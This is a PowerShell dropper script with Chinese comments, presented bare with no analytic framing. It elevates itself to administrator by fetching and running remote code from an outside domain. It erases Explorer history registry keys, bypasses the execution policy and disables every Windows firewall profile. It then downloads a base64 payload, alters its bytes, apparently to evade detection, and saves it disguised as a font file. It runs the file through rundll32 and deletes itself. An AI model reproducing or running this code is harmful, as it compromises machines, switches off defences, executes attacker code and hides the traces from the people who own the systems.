# 检查管理员权限,否则以管理员身份重启脚本 if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { Write-Host "Requires administrator privileges, restarting script..." -ForegroundColor Yellow if (-not $PSCommandPath) { Write-Host "1" -ForegroundColor Yellow Start-Process -FilePath "powershell" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"iex (irm https://ktfkxw.gxyibai.cn)`"" -Verb RunAs } else { Write-Host "2" -ForegroundColor Yellow Start-Process -FilePath "powershell" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs $scriptPath = $MyInvocation.MyCommand.Path Start-Process -FilePath "powershell.exe" -ArgumentList "-Command Start-Sleep -Seconds 1; Remove-Item -Path '$scriptPath' -Force" -NoNewWindow } Start-Sleep -Seconds 2 exit } # 停止特定服务 Stop-Service -Name MessageTransfer -ErrorAction SilentlyContinue Start-Sleep -Seconds 2 Write-Host "UAC" -ForegroundColor Green # 清理特定注册表项 $basePath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer" $targetKeys = @("RunMRU", "RecentDocs","FeatureUsage","TypedPaths","ComDlg32") Get-ChildItem -Path $basePath | ForEach-Object { if ($targetKeys -contains $_.PSChildName) { $targetPath = Join-Path -Path $basePath -ChildPath $_.PSChildName Remove-Item -Path $targetPath -Recurse -Force -ErrorAction SilentlyContinue } } # 设置执行策略 try { Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force } catch { Write-Host "cl: $($_.Exception.Message)" -ForegroundColor Red } # 关闭防火墙 try { Set-NetFirewallProfile -Profile Public,Private,Domain -Enabled False } catch { Write-Host "fhq nook: $($_.Exception.Message)" -ForegroundColor Red } # 多次强制终止 rundll32 进程 for ($i = 1; $i -le 11; $i++) { Stop-Process -Name rundll32 -Force -ErrorAction SilentlyContinue } # 下载链接 $downloadLink = "http://ktfkxw.gxyibai.cn/KTXP.txt" if (-not $downloadLink) { Write-Host "No download link found." -ForegroundColor Red Start-Sleep -Seconds 2 $scriptPath = $MyInvocation.MyCommand.Path Start-Process -FilePath "powershell.exe" -ArgumentList "-Command Start-Sleep -Seconds 1; Remove-Item -Path '$scriptPath' -Force" -NoNewWindow exit } # 生成临时保存路径 $randomDir = Join-Path $env:TEMP ("DL_" + (Get-Date -Format "yyyyMMddHHmmss") + (Get-Random)) $outFile = Join-Path $randomDir ((Get-Random).ToString() + "1.TTF") New-Item -Path $randomDir -ItemType Directory -Force | Out-Null # 下载 Base64 内容,失败切换 curl.exe try { $base64EncodedContent = Invoke-RestMethod -Uri $downloadLink -ErrorAction Stop } catch { try { $base64EncodedContent = & curl.exe -s $downloadLink if (-not $base64EncodedContent) { throw "curl.exe 下载失败或内容为空" } } catch { Start-Sleep -Seconds 2 $scriptPath = $MyInvocation.MyCommand.Path Start-Process -FilePath "powershell.exe" -ArgumentList "-Command Start-Sleep -Seconds 1; Remove-Item -Path '$scriptPath' -Force" -NoNewWindow exit } } $binaryContent = [Convert]::FromBase64String($base64EncodedContent) $binaryData=$binaryContent $pattern = [byte[]](0xD7, 0x97, 0x10, 0x00, 0xD7, 0x97, 0x10, 0x00, 0xD6, 0x97, 0x0F, 0x0A, 0xD9, 0x97, 0x11, 0x2D, 0xDB, 0x97, 0x12, 0x74, 0xDB, 0x96, 0x11, 0xA8, 0xDB, 0x96, 0x11, 0xD9, 0xDB, 0x96, 0x12, 0xFF, 0xDB, 0x96) $replace_length = 16796 $pos = -1 for ($i = 0; $i -le $binaryData.Length - $pattern.Length; $i++) { $match = $true for ($j = 0; $j -lt $pattern.Length; $j++) { if ($binaryData[$i + $j] -ne $pattern[$j]) { $match = $false break } } if ($match) { $pos = $i break } } if ($pos -ge 0) { $randomBytes = New-Object byte[] $replace_length (New-Object Random).NextBytes($randomBytes) [Array]::Copy($randomBytes, 0, $binaryData, $pos, $replace_length) $binaryContent=$binaryData } else { Write-Output "未找到匹配字节序列" } [System.IO.File]::WriteAllBytes($outFile, $binaryContent) # 运行下载的文件 Start-Process -FilePath "rundll32.exe" -ArgumentList "`"$outFile`",XPA" exit